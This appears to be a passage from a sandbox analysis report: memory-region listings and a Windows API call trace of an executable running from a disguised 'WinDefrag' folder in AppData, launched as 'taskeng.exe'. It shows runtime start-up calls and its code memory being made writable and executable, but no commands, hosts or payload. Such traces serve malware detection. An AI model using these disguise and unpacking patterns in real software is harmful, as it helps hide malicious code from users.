"" Region: id = 5620 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5623 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5628 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5631 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5636 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5639 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5642 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5645 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5648 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5651 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5654 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5657 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5660 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5663 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5666 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5669 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5672 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5678 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5681 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5684 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5687 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5690 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5693 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5696 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5699 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5702 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5705 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5708 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5711 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5714 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5717 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5720 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5723 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5725 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Thread: id = 362 os_tid = 0x67c [0230.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff50 | out: lpSystemTimeAsFileTime=0x28ff50*(dwLowDateTime=0x26378c40, dwHighDateTime=0x1d48db3)) [0230.443] GetCurrentProcessId () returned 0x534 [0230.443] GetCurrentThreadId () returned 0x67c [0230.443] GetTickCount () returned 0x43a41 [0230.443] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff58 | out: lpPerformanceCount=0x28ff58*=1829806700000) returned 1 [0230.443] GetStartupInfoA (in: lpStartupInfo=0x28ff2c | out: lpStartupInfo=0x28ff2c*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0230.444] __set_app_type (_Type=0x2) [0230.444] __getmainargs (in: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014, _DoWildCard=0, _StartInfo=0x41f000 | out: _Argc=0x41f01c, _Argv=0x41f018, _Env=0x41f014) returned 0 [0230.444] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0230.444] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fdb0 | out: lpflOldProtect=0x28fdb0*=0x20) returned 1 [0230.445] VirtualQuery (in: lpAddress=0x4012b9, lpBuffer=0x28fd64, dwLength=0x1c | out: lpBuffer=0x28fd64*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x15000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0230.445] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x80) returned 1 [0230.445] VirtualProtect (in: lpAddress=0x401000, dwSize=0x15000, flNewProtect=0x80, lpflOldProtect=0x28fd60 | out: lpflOldProtect=0x28fd60*=0x40) returned 1 [0230.445] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0230.445] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x28fe90 | out: lpflOldProtect=0x28fe90*=0x40) returned 1 [0230.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4096a0) returned 0x0 [0230.446] strlen (_Str="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x37 [0230.446] _onexit (_Func=0x409e50) returned 0x409e50 [0230.446] strlen (_Str="use_fc_key") returned 0xa [0230.446] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-use_fc_key") returned 0x2c [0230.446] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.446] FindAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.447] AddAtomA (lpString="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAAaaaaaAAAAAaAAAaa") returned 0xc000 [0230.447] GetAtomNameA (in: nAtom=0xc000, lpBuffer=0x28fd7c, nSize=59 | out: lpBuffer="gcc-shmem-tdm2-use_fc_key-aaaaaaaaaaAAaAAAaaaaaAAAAAaAAAaa") returned 0x3a [0230.447] ReleaseMutex (hMutex=0x2c) returned 1 [0230.447] CloseHandle (hObject=0x2c) returned 1 [0230.447] strlen (_Str="sjlj_once") returned 0x9 [0230.447] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-sjlj_once") returned 0x2c [0230.447] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.447] FindAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.447] AddAtomA (lpString="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAAaaaaaAAAAAAaaAaa") returned 0xc001 [0230.447] GetAtomNameA (in: nAtom=0xc001, lpBuffer=0x28fd5c, nSize=58 | out: lpBuffer="gcc-shmem-tdm2-sjlj_once-aaaaaaaaaaAAaAAAaaaaaAAAAAAaaAaa") returned 0x39 [0230.448] ReleaseMutex (hMutex=0x2c) returned 1 [0230.448] CloseHandle (hObject=0x2c) returned 1 [0230.448] strlen (_Str="once_global_shmem") returned 0x11 [0230.448] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_global_shmem") returned 0x2c [0230.448] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.448] FindAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.448] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAAaaaaaAAAAAAaAAaa") returned 0xc002 [0230.448] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x28fcec, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAAaAAAaaaaaAAAAAAaAAa") returned 0x40 [0230.448] ReleaseMutex (hMutex=0x2c) returned 1 [0230.448] CloseHandle (hObject=0x2c) returned 1 [0230.448] strlen (_Str="once_obj_shmem") returned 0xe [0230.448] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x2c [0230.448] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.448] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.448] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAAaaaaaAAAAAAAAaaa") returned 0xc003 [0230.448] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x28fcfc, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAAaAAAaaaaaAAAAAAAAaa") returned 0x3d [0230.448] ReleaseMutex (hMutex=0x2c) returned 1 [0230.448] CloseHandle (hObject=0x2c) returned 1 [0230.449] calloc (_Count=0x1, _Size=0x10) returned 0x6e1000 [0230.449] strlen (_Str="mutex_global_shmem") returned 0x12 [0230.449] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x2c [0230.449] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.449] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.449] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaaaAAaa") returned 0xc004 [0230.449] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x28fc9c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaaaAAa") returned 0x41 [0230.449] ReleaseMutex (hMutex=0x2c) returned 1 [0230.449] CloseHandle (hObject=0x2c) returned 1 [0230.449] calloc (_Count=0x1, _Size=0x1c) returned 0x6e1030 [0230.449] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x2c [0230.450] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0230.450] GetCurrentThreadId () returned 0x67c [0230.450] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0230.450] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x30 [0230.450] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.450] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.450] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAaAAaa") returned 0xc005 [0230.450] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAaAAa") returned 0x46 [0230.450] ReleaseMutex (hMutex=0x30) returned 1 [0230.450] CloseHandle (hObject=0x30) returned 1 [0230.450] calloc (_Count=0x1, _Size=0x10) returned 0x6e1068 [0230.450] calloc (_Count=0x1, _Size=0x1c) returned 0x6e1080 [0230.450] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0230.450] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.450] GetCurrentThreadId () returned 0x67c [0230.450] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0230.450] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x34 [0230.450] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.450] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.451] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAaAaAaa") returned 0xc006 [0230.451] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x28fc7c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAaAaAa") returned 0x41 [0230.451] ReleaseMutex (hMutex=0x34) returned 1 [0230.451] CloseHandle (hObject=0x34) returned 1 [0230.451] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0230.451] CloseHandle (hObject=0x30) returned 1 [0230.451] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0230.451] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x30 [0230.451] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.451] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.451] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAAaAaa") returned 0xc007 [0230.451] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x28fc9c, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAAaAa") returned 0x44 [0230.451] ReleaseMutex (hMutex=0x30) returned 1 [0230.451] CloseHandle (hObject=0x30) returned 1 [0230.451] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0230.451] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x30 [0230.451] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.451] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.451] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAAAAaa") returned 0xc008 [0230.452] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x28fc2c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaaAAAAa") returned 0x48 [0230.452] ReleaseMutex (hMutex=0x30) returned 1 [0230.452] CloseHandle (hObject=0x30) returned 1 [0230.452] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0230.452] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x30 [0230.452] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.452] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.452] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAaaAaaa") returned 0xc009 [0230.452] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x28fc2c, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAaaAaa") returned 0x45 [0230.452] ReleaseMutex (hMutex=0x30) returned 1 [0230.452] CloseHandle (hObject=0x30) returned 1 [0230.452] calloc (_Count=0x1, _Size=0x1c) returned 0x6e10b8 [0230.452] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0230.452] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0230.452] GetCurrentThreadId () returned 0x67c [0230.452] strlen (_Str="pthr_root_shmem") returned 0xf [0230.452] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x34 [0230.452] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.452] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.452] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAAAaaaa") returned 0xc00a [0230.452] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x28fcac, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAAaaaaAaaaaAAAaaa") returned 0x3e [0230.452] ReleaseMutex (hMutex=0x34) returned 1 [0230.453] CloseHandle (hObject=0x34) returned 1 [0230.453] calloc (_Count=0x1, _Size=0xc0) returned 0x6e10f0 [0230.453] strlen (_Str="idListCnt_shmem") returned 0xf [0230.453] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x34 [0230.453] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.453] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.453] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAAaaaaAaaaAAaAAAaa") returned 0xc00b [0230.453] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAAaaaaAaaaAAaAAAa") returned 0x3e [0230.453] ReleaseMutex (hMutex=0x34) returned 1 [0230.453] CloseHandle (hObject=0x34) returned 1 [0230.453] strlen (_Str="idListMax_shmem") returned 0xf [0230.453] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x34 [0230.453] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.453] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.453] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAAaaaaAaaaAAAaaAaa") returned 0xc00c [0230.453] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAAaaaaAaaaAAAaaAa") returned 0x3e [0230.453] ReleaseMutex (hMutex=0x34) returned 1 [0230.453] CloseHandle (hObject=0x34) returned 1 [0230.453] strlen (_Str="idList_shmem") returned 0xc [0230.453] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x34 [0230.454] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.454] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.454] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaaAAaaaa") returned 0xc00d [0230.454] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x28fc7c, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaaAAaaa") returned 0x3b [0230.454] ReleaseMutex (hMutex=0x34) returned 1 [0230.454] CloseHandle (hObject=0x34) returned 1 [0230.454] strlen (_Str="idListNextId_shmem") returned 0x12 [0230.454] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x34 [0230.454] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0230.454] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.454] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaaAAAaaa") returned 0xc00e [0230.454] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x28fc6c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaaAAAaa") returned 0x41 [0230.454] ReleaseMutex (hMutex=0x34) returned 1 [0230.454] CloseHandle (hObject=0x34) returned 1 [0230.454] GetCurrentThreadId () returned 0x67c [0230.454] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0230.454] GetCurrentThreadId () returned 0x67c [0230.454] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34 [0230.454] GetCurrentProcess () returned 0xffffffff [0230.454] GetCurrentThread () returned 0xfffffffe [0230.454] GetCurrentProcess () returned 0xffffffff [0230.454] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6e1104, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6e1104*=0x38) returned 1 [0230.455] GetThreadPriority (hThread=0x38) returned 0 [0230.455] strlen (_Str="fc_key") returned 0x6 [0230.455] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x3c [0230.455] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0230.455] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.455] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAAaaaaAaaAaAaaaaaa") returned 0xc00f [0230.455] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x28fcfc, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAAaaaaAaaAaAaaaaaa") returned 0x36 [0230.455] ReleaseMutex (hMutex=0x3c) returned 1 [0230.455] CloseHandle (hObject=0x3c) returned 1 [0230.455] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0230.455] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x3c [0230.455] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0230.455] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.455] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaAaaAaaa") returned 0xc010 [0230.455] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaAaaAaa") returned 0x46 [0230.455] ReleaseMutex (hMutex=0x3c) returned 1 [0230.455] CloseHandle (hObject=0x3c) returned 1 [0230.455] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0230.456] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x3c [0230.456] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0230.456] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.456] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaAaAaaaa") returned 0xc011 [0230.456] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x28fc5c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAAaaaaAaaAaAaAaaa") returned 0x48 [0230.456] ReleaseMutex (hMutex=0x3c) returned 1 [0230.456] CloseHandle (hObject=0x3c) returned 1 [0230.456] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0230.456] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x3c [0230.456] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0230.456] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0230.456] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAAaaaaAaaAaAaAAaaa") returned 0xc012 [0230.456] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x28fc3c, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAAaaaaAaaAaAaAAaa") returned 0x47 [0230.456] ReleaseMutex (hMutex=0x3c) returned 1 [0230.456] CloseHandle (hObject=0x3c) returned 1 [0230.456] calloc (_Count=0x1, _Size=0x20) returned 0x6e12c8 [0230.456] calloc (_Count=0x1, _Size=0x1c) returned 0x6e12f0 [0230.456] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x3c [0230.456] calloc (_Count=0x1, _Size=0x1c) returned 0x6e1318 [0230.456] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x40 [0230.457] calloc (_Count=0x1, _Size=0x6c) returned 0x6e23d8 [0230.457] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x44 [0230.457] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x48 [0230.457] strlen (_Str="rwl_global_shmem") returned 0x10 [0230.457] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x4c [0230.457] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0230.457] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 